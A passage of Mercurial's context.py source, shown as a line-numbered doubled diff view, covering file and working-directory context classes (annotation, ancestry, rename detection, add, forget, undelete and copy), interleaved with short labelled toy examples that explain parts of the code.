893 file
893 file
894 - line.text is the data on that line (including newline character)
894 - line.text is the data on that line (including newline character)
895 """
895 """
896 getlog = util.lrucachefunc(lambda x: self._repo.file(x))
896 getlog = util.lrucachefunc(lambda x: self._repo.file(x))
897
897
898 def parents(f):
898 def parents(f):
899 # Cut _descendantrev here to mitigate the penalty of lazy linkrev
899 # Cut _descendantrev here to mitigate the penalty of lazy linkrev
900 # adjustment. Otherwise, p._adjustlinkrev() would walk changelog
900 # adjustment. Otherwise, p._adjustlinkrev() would walk changelog
901 # from the topmost introrev (= srcrev) down to p.linkrev() if it
901 # from the topmost introrev (= srcrev) down to p.linkrev() if it
902 # isn't an ancestor of the srcrev.
902 # isn't an ancestor of the srcrev.
903 f._changeid
903 f._changeid
904 pl = f.parents()
904 pl = f.parents()
905
905
906 # Don't return renamed parents if we aren't following.
906 # Don't return renamed parents if we aren't following.
907 if not follow:
907 if not follow:
908 pl = [p for p in pl if p.path() == f.path()]
908 pl = [p for p in pl if p.path() == f.path()]
909
909
910 # renamed filectx won't have a filelog yet, so set it
910 # renamed filectx won't have a filelog yet, so set it
911 # from the cache to save time
911 # from the cache to save time
912 for p in pl:
912 for p in pl:
913 if r'_filelog' not in p.__dict__:
913 if r'_filelog' not in p.__dict__:
914 p._filelog = getlog(p.path())
914 p._filelog = getlog(p.path())
915
915
916 return pl
916 return pl
917
917
918 # use linkrev to find the first changeset where self appeared
918 # use linkrev to find the first changeset where self appeared
919 base = self.introfilectx()
919 base = self.introfilectx()
920 if getattr(base, '_ancestrycontext', None) is None:
920 if getattr(base, '_ancestrycontext', None) is None:
921 cl = self._repo.changelog
921 cl = self._repo.changelog
922 if base.rev() is None:
922 if base.rev() is None:
923 # wctx is not inclusive, but works because _ancestrycontext
923 # wctx is not inclusive, but works because _ancestrycontext
924 # is used to test filelog revisions
924 # is used to test filelog revisions
925 ac = cl.ancestors([p.rev() for p in base.parents()],
925 ac = cl.ancestors([p.rev() for p in base.parents()],
926 inclusive=True)
926 inclusive=True)
927 else:
927 else:
928 ac = cl.ancestors([base.rev()], inclusive=True)
928 ac = cl.ancestors([base.rev()], inclusive=True)
929 base._ancestrycontext = ac
929 base._ancestrycontext = ac
930
930
931 return dagop.annotate(base, parents, skiprevs=skiprevs,
931 return dagop.annotate(base, parents, skiprevs=skiprevs,
932 diffopts=diffopts)
932 diffopts=diffopts)
933
933
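# An illustrative aside, not part of context.py: util.lrucachefunc above
# memoizes the repeated filelog lookups annotate performs; stock Python's
# functools gives the same effect (a sketch, not Mercurial's helper):

import functools

calls = []

@functools.lru_cache(maxsize=None)
def getlog(path):
    calls.append(path)        # stands in for an expensive filelog open
    return ('filelog', path)

getlog('a'); getlog('a')
assert calls == ['a']         # the second lookup is served from the cache
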
934 def ancestors(self, followfirst=False):
934 def ancestors(self, followfirst=False):
935 visit = {}
935 visit = {}
936 c = self
936 c = self
937 if followfirst:
937 if followfirst:
938 cut = 1
938 cut = 1
939 else:
939 else:
940 cut = None
940 cut = None
941
941
942 while True:
942 while True:
943 for parent in c.parents()[:cut]:
943 for parent in c.parents()[:cut]:
944 visit[(parent.linkrev(), parent.filenode())] = parent
944 visit[(parent.linkrev(), parent.filenode())] = parent
945 if not visit:
945 if not visit:
946 break
946 break
947 c = visit.pop(max(visit))
947 c = visit.pop(max(visit))
948 yield c
948 yield c
949
949
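# An illustrative aside, not part of context.py: the loop above is a
# best-first walk keyed on (linkrev, filenode), so ancestors come out in
# descending order; a toy equivalent over a made-up parent map:

PARENTS = {4: [3, 2], 3: [1], 2: [1], 1: []}

def toyancestors(rev):
    visit = {}
    c = rev
    while True:
        for parent in PARENTS[c]:
            visit[parent] = parent    # the dict also de-duplicates
        if not visit:
            break
        c = visit.pop(max(visit))
        yield c

assert list(toyancestors(4)) == [3, 2, 1]
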
950 def decodeddata(self):
950 def decodeddata(self):
951 """Returns `data()` after running repository decoding filters.
951 """Returns `data()` after running repository decoding filters.
952
952
953 This is often equivalent to how the data would be expressed on disk.
953 This is often equivalent to how the data would be expressed on disk.
954 """
954 """
955 return self._repo.wwritedata(self.path(), self.data())
955 return self._repo.wwritedata(self.path(), self.data())
956
956
957 class filectx(basefilectx):
957 class filectx(basefilectx):
958 """A filecontext object makes access to data related to a particular
958 """A filecontext object makes access to data related to a particular
959 filerevision convenient."""
959 filerevision convenient."""
960 def __init__(self, repo, path, changeid=None, fileid=None,
960 def __init__(self, repo, path, changeid=None, fileid=None,
961 filelog=None, changectx=None):
961 filelog=None, changectx=None):
962 """changeid can be a changeset revision, node, or tag.
962 """changeid can be a changeset revision, node, or tag.
963 fileid can be a file revision or node."""
963 fileid can be a file revision or node."""
964 self._repo = repo
964 self._repo = repo
965 self._path = path
965 self._path = path
966
966
967 assert (changeid is not None
967 assert (changeid is not None
968 or fileid is not None
968 or fileid is not None
969 or changectx is not None), \
969 or changectx is not None), \
970 ("bad args: changeid=%r, fileid=%r, changectx=%r"
970 ("bad args: changeid=%r, fileid=%r, changectx=%r"
971 % (changeid, fileid, changectx))
971 % (changeid, fileid, changectx))
972
972
973 if filelog is not None:
973 if filelog is not None:
974 self._filelog = filelog
974 self._filelog = filelog
975
975
976 if changeid is not None:
976 if changeid is not None:
977 self._changeid = changeid
977 self._changeid = changeid
978 if changectx is not None:
978 if changectx is not None:
979 self._changectx = changectx
979 self._changectx = changectx
980 if fileid is not None:
980 if fileid is not None:
981 self._fileid = fileid
981 self._fileid = fileid
982
982
983 @propertycache
983 @propertycache
984 def _changectx(self):
984 def _changectx(self):
985 try:
985 try:
986 return changectx(self._repo, self._changeid)
986 return changectx(self._repo, self._changeid)
987 except error.FilteredRepoLookupError:
987 except error.FilteredRepoLookupError:
988 # Linkrev may point to any revision in the repository. When the
988 # Linkrev may point to any revision in the repository. When the
989 # repository is filtered this may lead to `filectx` trying to build a
989 # repository is filtered this may lead to `filectx` trying to build a
990 # `changectx` for a filtered revision. In such a case we fall back to
990 # `changectx` for a filtered revision. In such a case we fall back to
991 # creating a `changectx` on the unfiltered version of the repository.
991 # creating a `changectx` on the unfiltered version of the repository.
992 # This fallback should not be an issue because `changectx` objects
992 # This fallback should not be an issue because `changectx` objects
993 # built from `filectx` are not used in complex operations that care
993 # built from `filectx` are not used in complex operations that care
994 # about filtering.
994 # about filtering.
995 #
995 #
996 # This fallback is a cheap and dirty fix that prevents several
996 # This fallback is a cheap and dirty fix that prevents several
997 # crashes. It does not ensure the behavior is correct. However the
997 # crashes. It does not ensure the behavior is correct. However the
998 # behavior was not correct before filtering either, and "incorrect
998 # behavior was not correct before filtering either, and "incorrect
999 # behavior" is seen as better than a "crash".
999 # behavior" is seen as better than a "crash".
1000 #
1000 #
1001 # Linkrevs have several serious troubles with filtering that are
1001 # Linkrevs have several serious troubles with filtering that are
1002 # complicated to solve. Proper handling of the issue here should be
1002 # complicated to solve. Proper handling of the issue here should be
1003 # considered when solutions to the linkrev issues are on the table.
1003 # considered when solutions to the linkrev issues are on the table.
1004 return changectx(self._repo.unfiltered(), self._changeid)
1004 return changectx(self._repo.unfiltered(), self._changeid)
1005
1005
1006 def filectx(self, fileid, changeid=None):
1006 def filectx(self, fileid, changeid=None):
1007 '''opens an arbitrary revision of the file without
1007 '''opens an arbitrary revision of the file without
1008 opening a new filelog'''
1008 opening a new filelog'''
1009 return filectx(self._repo, self._path, fileid=fileid,
1009 return filectx(self._repo, self._path, fileid=fileid,
1010 filelog=self._filelog, changeid=changeid)
1010 filelog=self._filelog, changeid=changeid)
1011
1011
1012 def rawdata(self):
1012 def rawdata(self):
1013 return self._filelog.revision(self._filenode, raw=True)
1013 return self._filelog.revision(self._filenode, raw=True)
1014
1014
1015 def rawflags(self):
1015 def rawflags(self):
1016 """low-level revlog flags"""
1016 """low-level revlog flags"""
1017 return self._filelog.flags(self._filerev)
1017 return self._filelog.flags(self._filerev)
1018
1018
1019 def data(self):
1019 def data(self):
1020 try:
1020 try:
1021 return self._filelog.read(self._filenode)
1021 return self._filelog.read(self._filenode)
1022 except error.CensoredNodeError:
1022 except error.CensoredNodeError:
1023 if self._repo.ui.config("censor", "policy") == "ignore":
1023 if self._repo.ui.config("censor", "policy") == "ignore":
1024 return ""
1024 return ""
1025 raise error.Abort(_("censored node: %s") % short(self._filenode),
1025 raise error.Abort(_("censored node: %s") % short(self._filenode),
1026 hint=_("set censor.policy to ignore errors"))
1026 hint=_("set censor.policy to ignore errors"))
1027
1027
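# An illustrative aside, not part of context.py: the censor fallback in
# data() above, reduced to its control flow (CensoredError stands in for
# error.CensoredNodeError, and readfn for the filelog read):

class CensoredError(Exception):
    pass

def readdata(readfn, policy):
    try:
        return readfn()
    except CensoredError:
        if policy == "ignore":
            return ""         # act as if the censored file were empty
        raise                 # otherwise surface the error to the caller

def censored():
    raise CensoredError()

assert readdata(censored, "ignore") == ""
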
1028 def size(self):
1028 def size(self):
1029 return self._filelog.size(self._filerev)
1029 return self._filelog.size(self._filerev)
1030
1030
1031 @propertycache
1031 @propertycache
1032 def _copied(self):
1032 def _copied(self):
1033 """check if file was actually renamed in this changeset revision
1033 """check if file was actually renamed in this changeset revision
1034
1034
1035 If a rename is logged in the file revision, we report the copy for the
1035 If a rename is logged in the file revision, we report the copy for the
1036 changeset only if the file revision's linkrev points back to the
1036 changeset only if the file revision's linkrev points back to the
1037 changeset in question or both changeset parents contain different file revisions.
1037 changeset in question or both changeset parents contain different file revisions.
1038 """
1038 """
1039
1039
1040 renamed = self._filelog.renamed(self._filenode)
1040 renamed = self._filelog.renamed(self._filenode)
1041 if not renamed:
1041 if not renamed:
1042 return renamed
1042 return renamed
1043
1043
1044 if self.rev() == self.linkrev():
1044 if self.rev() == self.linkrev():
1045 return renamed
1045 return renamed
1046
1046
1047 name = self.path()
1047 name = self.path()
1048 fnode = self._filenode
1048 fnode = self._filenode
1049 for p in self._changectx.parents():
1049 for p in self._changectx.parents():
1050 try:
1050 try:
1051 if fnode == p.filenode(name):
1051 if fnode == p.filenode(name):
1052 return None
1052 return None
1053 except error.LookupError:
1053 except error.LookupError:
1054 pass
1054 pass
1055 return renamed
1055 return renamed
1056
1056
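# An illustrative aside, not part of context.py: the rule _copied applies
# above, as a standalone predicate (parent_filenodes stands in for the
# p.filenode(name) lookups, which may also raise and be skipped):

def reportcopy(renamed, rev, linkrev, parent_filenodes, fnode):
    if not renamed:
        return None
    if rev == linkrev:
        return renamed        # introduced right here: report the copy
    if any(pf == fnode for pf in parent_filenodes):
        return None           # identical to a parent: not a new copy
    return renamed
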
1057 def children(self):
1057 def children(self):
1058 # hard for renames
1058 # hard for renames
1059 c = self._filelog.children(self._filenode)
1059 c = self._filelog.children(self._filenode)
1060 return [filectx(self._repo, self._path, fileid=x,
1060 return [filectx(self._repo, self._path, fileid=x,
1061 filelog=self._filelog) for x in c]
1061 filelog=self._filelog) for x in c]
1062
1062
1063 class committablectx(basectx):
1063 class committablectx(basectx):
1064 """A committablectx object provides common functionality for a context that
1064 """A committablectx object provides common functionality for a context that
1065 wants the ability to commit, e.g. workingctx or memctx."""
1065 wants the ability to commit, e.g. workingctx or memctx."""
1066 def __init__(self, repo, text="", user=None, date=None, extra=None,
1066 def __init__(self, repo, text="", user=None, date=None, extra=None,
1067 changes=None):
1067 changes=None):
1068 super(committablectx, self).__init__(repo)
1068 super(committablectx, self).__init__(repo)
1069 self._rev = None
1069 self._rev = None
1070 self._node = None
1070 self._node = None
1071 self._text = text
1071 self._text = text
1072 if date:
1072 if date:
1073 self._date = dateutil.parsedate(date)
1073 self._date = dateutil.parsedate(date)
1074 if user:
1074 if user:
1075 self._user = user
1075 self._user = user
1076 if changes:
1076 if changes:
1077 self._status = changes
1077 self._status = changes
1078
1078
1079 self._extra = {}
1079 self._extra = {}
1080 if extra:
1080 if extra:
1081 self._extra = extra.copy()
1081 self._extra = extra.copy()
1082 if 'branch' not in self._extra:
1082 if 'branch' not in self._extra:
1083 try:
1083 try:
1084 branch = encoding.fromlocal(self._repo.dirstate.branch())
1084 branch = encoding.fromlocal(self._repo.dirstate.branch())
1085 except UnicodeDecodeError:
1085 except UnicodeDecodeError:
1086 raise error.Abort(_('branch name not in UTF-8!'))
1086 raise error.Abort(_('branch name not in UTF-8!'))
1087 self._extra['branch'] = branch
1087 self._extra['branch'] = branch
1088 if self._extra['branch'] == '':
1088 if self._extra['branch'] == '':
1089 self._extra['branch'] = 'default'
1089 self._extra['branch'] = 'default'
1090
1090
1091 def __bytes__(self):
1091 def __bytes__(self):
1092 return bytes(self._parents[0]) + "+"
1092 return bytes(self._parents[0]) + "+"
1093
1093
1094 __str__ = encoding.strmethod(__bytes__)
1094 __str__ = encoding.strmethod(__bytes__)
1095
1095
1096 def __nonzero__(self):
1096 def __nonzero__(self):
1097 return True
1097 return True
1098
1098
1099 __bool__ = __nonzero__
1099 __bool__ = __nonzero__
1100
1100
1101 def _buildflagfunc(self):
1101 def _buildflagfunc(self):
1102 # Create a fallback function for getting file flags when the
1102 # Create a fallback function for getting file flags when the
1103 # filesystem doesn't support them
1103 # filesystem doesn't support them
1104
1104
1105 copiesget = self._repo.dirstate.copies().get
1105 copiesget = self._repo.dirstate.copies().get
1106 parents = self.parents()
1106 parents = self.parents()
1107 if len(parents) < 2:
1107 if len(parents) < 2:
1108 # when we have one parent, it's easy: copy from parent
1108 # when we have one parent, it's easy: copy from parent
1109 man = parents[0].manifest()
1109 man = parents[0].manifest()
1110 def func(f):
1110 def func(f):
1111 f = copiesget(f, f)
1111 f = copiesget(f, f)
1112 return man.flags(f)
1112 return man.flags(f)
1113 else:
1113 else:
1114 # merges are tricky: we try to reconstruct the unstored
1114 # merges are tricky: we try to reconstruct the unstored
1115 # result from the merge (issue1802)
1115 # result from the merge (issue1802)
1116 p1, p2 = parents
1116 p1, p2 = parents
1117 pa = p1.ancestor(p2)
1117 pa = p1.ancestor(p2)
1118 m1, m2, ma = p1.manifest(), p2.manifest(), pa.manifest()
1118 m1, m2, ma = p1.manifest(), p2.manifest(), pa.manifest()
1119
1119
1120 def func(f):
1120 def func(f):
1121 f = copiesget(f, f) # may be wrong for merges with copies
1121 f = copiesget(f, f) # may be wrong for merges with copies
1122 fl1, fl2, fla = m1.flags(f), m2.flags(f), ma.flags(f)
1122 fl1, fl2, fla = m1.flags(f), m2.flags(f), ma.flags(f)
1123 if fl1 == fl2:
1123 if fl1 == fl2:
1124 return fl1
1124 return fl1
1125 if fl1 == fla:
1125 if fl1 == fla:
1126 return fl2
1126 return fl2
1127 if fl2 == fla:
1127 if fl2 == fla:
1128 return fl1
1128 return fl1
1129 return '' # punt for conflicts
1129 return '' # punt for conflicts
1130
1130
1131 return func
1131 return func
1132
1132
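# An illustrative aside, not part of context.py: the three-way flag merge
# used in the merge branch above, as a standalone function:

def mergeflags(fl1, fl2, fla):
    if fl1 == fl2:
        return fl1
    if fl1 == fla:
        return fl2            # only the second parent changed the flag
    if fl2 == fla:
        return fl1            # only the first parent changed the flag
    return ''                 # both changed it differently: punt

assert mergeflags('x', '', '') == 'x'   # p1 added the exec bit; keep it
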
1133 @propertycache
1133 @propertycache
1134 def _flagfunc(self):
1134 def _flagfunc(self):
1135 return self._repo.dirstate.flagfunc(self._buildflagfunc)
1135 return self._repo.dirstate.flagfunc(self._buildflagfunc)
1136
1136
1137 @propertycache
1137 @propertycache
1138 def _status(self):
1138 def _status(self):
1139 return self._repo.status()
1139 return self._repo.status()
1140
1140
1141 @propertycache
1141 @propertycache
1142 def _user(self):
1142 def _user(self):
1143 return self._repo.ui.username()
1143 return self._repo.ui.username()
1144
1144
1145 @propertycache
1145 @propertycache
1146 def _date(self):
1146 def _date(self):
1147 ui = self._repo.ui
1147 ui = self._repo.ui
1148 date = ui.configdate('devel', 'default-date')
1148 date = ui.configdate('devel', 'default-date')
1149 if date is None:
1149 if date is None:
1150 date = dateutil.makedate()
1150 date = dateutil.makedate()
1151 return date
1151 return date
1152
1152
1153 def subrev(self, subpath):
1153 def subrev(self, subpath):
1154 return None
1154 return None
1155
1155
1156 def manifestnode(self):
1156 def manifestnode(self):
1157 return None
1157 return None
1158 def user(self):
1158 def user(self):
1159 return self._user or self._repo.ui.username()
1159 return self._user or self._repo.ui.username()
1160 def date(self):
1160 def date(self):
1161 return self._date
1161 return self._date
1162 def description(self):
1162 def description(self):
1163 return self._text
1163 return self._text
1164 def files(self):
1164 def files(self):
1165 return sorted(self._status.modified + self._status.added +
1165 return sorted(self._status.modified + self._status.added +
1166 self._status.removed)
1166 self._status.removed)
1167
1167
1168 def modified(self):
1168 def modified(self):
1169 return self._status.modified
1169 return self._status.modified
1170 def added(self):
1170 def added(self):
1171 return self._status.added
1171 return self._status.added
1172 def removed(self):
1172 def removed(self):
1173 return self._status.removed
1173 return self._status.removed
1174 def deleted(self):
1174 def deleted(self):
1175 return self._status.deleted
1175 return self._status.deleted
1176 def branch(self):
1176 def branch(self):
1177 return encoding.tolocal(self._extra['branch'])
1177 return encoding.tolocal(self._extra['branch'])
1178 def closesbranch(self):
1178 def closesbranch(self):
1179 return 'close' in self._extra
1179 return 'close' in self._extra
1180 def extra(self):
1180 def extra(self):
1181 return self._extra
1181 return self._extra
1182
1182
1183 def isinmemory(self):
1183 def isinmemory(self):
1184 return False
1184 return False
1185
1185
1186 def tags(self):
1186 def tags(self):
1187 return []
1187 return []
1188
1188
1189 def bookmarks(self):
1189 def bookmarks(self):
1190 b = []
1190 b = []
1191 for p in self.parents():
1191 for p in self.parents():
1192 b.extend(p.bookmarks())
1192 b.extend(p.bookmarks())
1193 return b
1193 return b
1194
1194
1195 def phase(self):
1195 def phase(self):
1196 phase = phases.draft # default phase to draft
1196 phase = phases.draft # default phase to draft
1197 for p in self.parents():
1197 for p in self.parents():
1198 phase = max(phase, p.phase())
1198 phase = max(phase, p.phase())
1199 return phase
1199 return phase
1200
1200
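# An illustrative aside, not part of context.py: phases are ordered small
# integers (public=0 < draft=1 < secret=2), so the max() above keeps a
# pending commit at least as private as its most private parent:

public, draft, secret = 0, 1, 2
assert max(draft, public, secret) == secret   # a secret parent wins
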
1201 def hidden(self):
1201 def hidden(self):
1202 return False
1202 return False
1203
1203
1204 def children(self):
1204 def children(self):
1205 return []
1205 return []
1206
1206
1207 def flags(self, path):
1207 def flags(self, path):
1208 if r'_manifest' in self.__dict__:
1208 if r'_manifest' in self.__dict__:
1209 try:
1209 try:
1210 return self._manifest.flags(path)
1210 return self._manifest.flags(path)
1211 except KeyError:
1211 except KeyError:
1212 return ''
1212 return ''
1213
1213
1214 try:
1214 try:
1215 return self._flagfunc(path)
1215 return self._flagfunc(path)
1216 except OSError:
1216 except OSError:
1217 return ''
1217 return ''
1218
1218
1219 def ancestor(self, c2):
1219 def ancestor(self, c2):
1220 """return the "best" ancestor context of self and c2"""
1220 """return the "best" ancestor context of self and c2"""
1221 return self._parents[0].ancestor(c2) # punt on two parents for now
1221 return self._parents[0].ancestor(c2) # punt on two parents for now
1222
1222
1223 def walk(self, match):
1223 def walk(self, match):
1224 '''Generates matching file names.'''
1224 '''Generates matching file names.'''
1225 return sorted(self._repo.dirstate.walk(match,
1225 return sorted(self._repo.dirstate.walk(match,
1226 subrepos=sorted(self.substate),
1226 subrepos=sorted(self.substate),
1227 unknown=True, ignored=False))
1227 unknown=True, ignored=False))
1228
1228
1229 def matches(self, match):
1229 def matches(self, match):
1230 ds = self._repo.dirstate
1230 ds = self._repo.dirstate
1231 return sorted(f for f in ds.matches(match) if ds[f] != 'r')
1231 return sorted(f for f in ds.matches(match) if ds[f] != 'r')
1232
1232
1233 def ancestors(self):
1233 def ancestors(self):
1234 for p in self._parents:
1234 for p in self._parents:
1235 yield p
1235 yield p
1236 for a in self._repo.changelog.ancestors(
1236 for a in self._repo.changelog.ancestors(
1237 [p.rev() for p in self._parents]):
1237 [p.rev() for p in self._parents]):
1238 yield changectx(self._repo, a)
1238 yield changectx(self._repo, a)
1239
1239
1240 def markcommitted(self, node):
1240 def markcommitted(self, node):
1241 """Perform post-commit cleanup necessary after committing this ctx
1241 """Perform post-commit cleanup necessary after committing this ctx
1242
1242
1243 Specifically, this updates the backing stores that this working context
1243 Specifically, this updates the backing stores that this working context
1244 wraps to reflect the fact that the changes reflected by this
1244 wraps to reflect the fact that the changes reflected by this
1245 workingctx have been committed. For example, it marks
1245 workingctx have been committed. For example, it marks
1246 modified and added files as normal in the dirstate.
1246 modified and added files as normal in the dirstate.
1247
1247
1248 """
1248 """
1249
1249
1250 with self._repo.dirstate.parentchange():
1250 with self._repo.dirstate.parentchange():
1251 for f in self.modified() + self.added():
1251 for f in self.modified() + self.added():
1252 self._repo.dirstate.normal(f)
1252 self._repo.dirstate.normal(f)
1253 for f in self.removed():
1253 for f in self.removed():
1254 self._repo.dirstate.drop(f)
1254 self._repo.dirstate.drop(f)
1255 self._repo.dirstate.setparents(node)
1255 self._repo.dirstate.setparents(node)
1256
1256
1257 # write changes out explicitly, because nesting wlock at
1257 # write changes out explicitly, because nesting wlock at
1258 # runtime may prevent 'wlock.release()' in 'repo.commit()'
1258 # runtime may prevent 'wlock.release()' in 'repo.commit()'
1259 # from immediately doing so for subsequent changing files
1259 # from immediately doing so for subsequent changing files
1260 self._repo.dirstate.write(self._repo.currenttransaction())
1260 self._repo.dirstate.write(self._repo.currenttransaction())
1261
1261
1262 def dirty(self, missing=False, merge=True, branch=True):
1262 def dirty(self, missing=False, merge=True, branch=True):
1263 return False
1263 return False
1264
1264
1265 class workingctx(committablectx):
1265 class workingctx(committablectx):
1266 """A workingctx object makes access to data related to
1266 """A workingctx object makes access to data related to
1267 the current working directory convenient.
1267 the current working directory convenient.
1268 date - any valid date string or (unixtime, offset), or None.
1268 date - any valid date string or (unixtime, offset), or None.
1269 user - username string, or None.
1269 user - username string, or None.
1270 extra - a dictionary of extra values, or None.
1270 extra - a dictionary of extra values, or None.
1271 changes - a list of file lists as returned by localrepo.status()
1271 changes - a list of file lists as returned by localrepo.status()
1272 or None to use the repository status.
1272 or None to use the repository status.
1273 """
1273 """
1274 def __init__(self, repo, text="", user=None, date=None, extra=None,
1274 def __init__(self, repo, text="", user=None, date=None, extra=None,
1275 changes=None):
1275 changes=None):
1276 super(workingctx, self).__init__(repo, text, user, date, extra, changes)
1276 super(workingctx, self).__init__(repo, text, user, date, extra, changes)
1277
1277
1278 def __iter__(self):
1278 def __iter__(self):
1279 d = self._repo.dirstate
1279 d = self._repo.dirstate
1280 for f in d:
1280 for f in d:
1281 if d[f] != 'r':
1281 if d[f] != 'r':
1282 yield f
1282 yield f
1283
1283
1284 def __contains__(self, key):
1284 def __contains__(self, key):
1285 return self._repo.dirstate[key] not in "?r"
1285 return self._repo.dirstate[key] not in "?r"
1286
1286
1287 def hex(self):
1287 def hex(self):
1288 return hex(wdirid)
1288 return hex(wdirid)
1289
1289
1290 @propertycache
1290 @propertycache
1291 def _parents(self):
1291 def _parents(self):
1292 p = self._repo.dirstate.parents()
1292 p = self._repo.dirstate.parents()
1293 if p[1] == nullid:
1293 if p[1] == nullid:
1294 p = p[:-1]
1294 p = p[:-1]
1295 return [changectx(self._repo, x) for x in p]
1295 return [changectx(self._repo, x) for x in p]
1296
1296
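# An illustrative aside, not part of context.py: the p[:-1] above simply
# hides an unset second parent; with nullid as the usual all-zero node:

nullid = b'\0' * 20

def realparents(p):
    return p[:-1] if p[1] == nullid else p

assert len(realparents((b'\x11' * 20, nullid))) == 1   # non-merge case
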
1297 def _fileinfo(self, path):
1297 def _fileinfo(self, path):
1298 # populate __dict__['_manifest'] as workingctx has no _manifestdelta
1298 # populate __dict__['_manifest'] as workingctx has no _manifestdelta
1299 self._manifest
1299 self._manifest
1300 return super(workingctx, self)._fileinfo(path)
1300 return super(workingctx, self)._fileinfo(path)
1301
1301
1302 def filectx(self, path, filelog=None):
1302 def filectx(self, path, filelog=None):
1303 """get a file context from the working directory"""
1303 """get a file context from the working directory"""
1304 return workingfilectx(self._repo, path, workingctx=self,
1304 return workingfilectx(self._repo, path, workingctx=self,
1305 filelog=filelog)
1305 filelog=filelog)
1306
1306
1307 def dirty(self, missing=False, merge=True, branch=True):
1307 def dirty(self, missing=False, merge=True, branch=True):
1308 "check whether a working directory is modified"
1308 "check whether a working directory is modified"
1309 # check subrepos first
1309 # check subrepos first
1310 for s in sorted(self.substate):
1310 for s in sorted(self.substate):
1311 if self.sub(s).dirty(missing=missing):
1311 if self.sub(s).dirty(missing=missing):
1312 return True
1312 return True
1313 # check current working dir
1313 # check current working dir
1314 return ((merge and self.p2()) or
1314 return ((merge and self.p2()) or
1315 (branch and self.branch() != self.p1().branch()) or
1315 (branch and self.branch() != self.p1().branch()) or
1316 self.modified() or self.added() or self.removed() or
1316 self.modified() or self.added() or self.removed() or
1317 (missing and self.deleted()))
1317 (missing and self.deleted()))
1318
1318
1319 def add(self, list, prefix=""):
1319 def add(self, list, prefix=""):
1320 with self._repo.wlock():
1320 with self._repo.wlock():
1321 ui, ds = self._repo.ui, self._repo.dirstate
1321 ui, ds = self._repo.ui, self._repo.dirstate
1322 uipath = lambda f: ds.pathto(pathutil.join(prefix, f))
1322 uipath = lambda f: ds.pathto(pathutil.join(prefix, f))
1323 rejected = []
1323 rejected = []
1324 lstat = self._repo.wvfs.lstat
1324 lstat = self._repo.wvfs.lstat
1325 for f in list:
1325 for f in list:
1326 # ds.pathto() returns an absolute file when this is invoked from
1326 # ds.pathto() returns an absolute file when this is invoked from
1327 # the keyword extension. That gets flagged as non-portable on
1327 # the keyword extension. That gets flagged as non-portable on
1328 # Windows, since it contains the drive letter and colon.
1328 # Windows, since it contains the drive letter and colon.
1329 scmutil.checkportable(ui, os.path.join(prefix, f))
1329 scmutil.checkportable(ui, os.path.join(prefix, f))
1330 try:
1330 try:
1331 st = lstat(f)
1331 st = lstat(f)
1332 except OSError:
1332 except OSError:
1333 ui.warn(_("%s does not exist!\n") % uipath(f))
1333 ui.warn(_("%s does not exist!\n") % uipath(f))
1334 rejected.append(f)
1334 rejected.append(f)
1335 continue
1335 continue
1336 if st.st_size > 10000000:
1336 if st.st_size > 10000000:
1337 ui.warn(_("%s: up to %d MB of RAM may be required "
1337 ui.warn(_("%s: up to %d MB of RAM may be required "
1338 "to manage this file\n"
1338 "to manage this file\n"
1339 "(use 'hg revert %s' to cancel the "
1339 "(use 'hg revert %s' to cancel the "
1340 "pending addition)\n")
1340 "pending addition)\n")
1341 % (f, 3 * st.st_size // 1000000, uipath(f)))
1341 % (f, 3 * st.st_size // 1000000, uipath(f)))
1342 if not (stat.S_ISREG(st.st_mode) or stat.S_ISLNK(st.st_mode)):
1342 if not (stat.S_ISREG(st.st_mode) or stat.S_ISLNK(st.st_mode)):
1343 ui.warn(_("%s not added: only files and symlinks "
1343 ui.warn(_("%s not added: only files and symlinks "
1344 "supported currently\n") % uipath(f))
1344 "supported currently\n") % uipath(f))
1345 rejected.append(f)
1345 rejected.append(f)
1346 elif ds[f] in 'amn':
1346 elif ds[f] in 'amn':
1347 ui.warn(_("%s already tracked!\n") % uipath(f))
1347 ui.warn(_("%s already tracked!\n") % uipath(f))
1348 elif ds[f] == 'r':
1348 elif ds[f] == 'r':
1349 ds.normallookup(f)
1349 ds.normallookup(f)
1350 else:
1350 else:
1351 ds.add(f)
1351 ds.add(f)
1352 return rejected
1352 return rejected
1353
1353
1354 def forget(self, files, prefix=""):
1354 def forget(self, files, prefix=""):
1355 with self._repo.wlock():
1355 with self._repo.wlock():
1356 ds = self._repo.dirstate
1356 ds = self._repo.dirstate
1357 uipath = lambda f: ds.pathto(pathutil.join(prefix, f))
1357 uipath = lambda f: ds.pathto(pathutil.join(prefix, f))
1358 rejected = []
1358 rejected = []
1359 for f in files:
1359 for f in files:
1360 if f not in self._repo.dirstate:
1360 if f not in self._repo.dirstate:
1361 self._repo.ui.warn(_("%s not tracked!\n") % uipath(f))
1361 self._repo.ui.warn(_("%s not tracked!\n") % uipath(f))
1362 rejected.append(f)
1362 rejected.append(f)
1363 elif self._repo.dirstate[f] != 'a':
1363 elif self._repo.dirstate[f] != 'a':
1364 self._repo.dirstate.remove(f)
1364 self._repo.dirstate.remove(f)
1365 else:
1365 else:
1366 self._repo.dirstate.drop(f)
1366 self._repo.dirstate.drop(f)
1367 return rejected
1367 return rejected
1368
1368
1369 def undelete(self, list):
1369 def undelete(self, list):
1370 pctxs = self.parents()
1370 pctxs = self.parents()
1371 with self._repo.wlock():
1371 with self._repo.wlock():
1372 ds = self._repo.dirstate
1372 ds = self._repo.dirstate
1373 for f in list:
1373 for f in list:
1374 if self._repo.dirstate[f] != 'r':
1374 if self._repo.dirstate[f] != 'r':
1375 self._repo.ui.warn(_("%s not removed!\n") % ds.pathto(f))
1375 self._repo.ui.warn(_("%s not removed!\n") % ds.pathto(f))
1376 else:
1376 else:
1377 fctx = pctxs[0][f] if f in pctxs[0] else pctxs[1][f]
1377 fctx = pctxs[0][f] if f in pctxs[0] else pctxs[1][f]
1378 t = fctx.data()
1378 t = fctx.data()
1379 self._repo.wwrite(f, t, fctx.flags())
1379 self._repo.wwrite(f, t, fctx.flags())
1380 self._repo.dirstate.normal(f)
1380 self._repo.dirstate.normal(f)
1381
1381
1382 def copy(self, source, dest):
1382 def copy(self, source, dest):
1383 try:
1383 try:
1384 st = self._repo.wvfs.lstat(dest)
1384 st = self._repo.wvfs.lstat(dest)
1385 except OSError as err:
1385 except OSError as err:
1386 if err.errno != errno.ENOENT:
1386 if err.errno != errno.ENOENT:
1387 raise
1387 raise
1388 self._repo.ui.warn(_("%s does not exist!\n")
1388 self._repo.ui.warn(_("%s does not exist!\n")
1389 % self._repo.dirstate.pathto(dest))
1389 % self._repo.dirstate.pathto(dest))
1390 return
1390 return
1391 if not (stat.S_ISREG(st.st_mode) or stat.S_ISLNK(st.st_mode)):
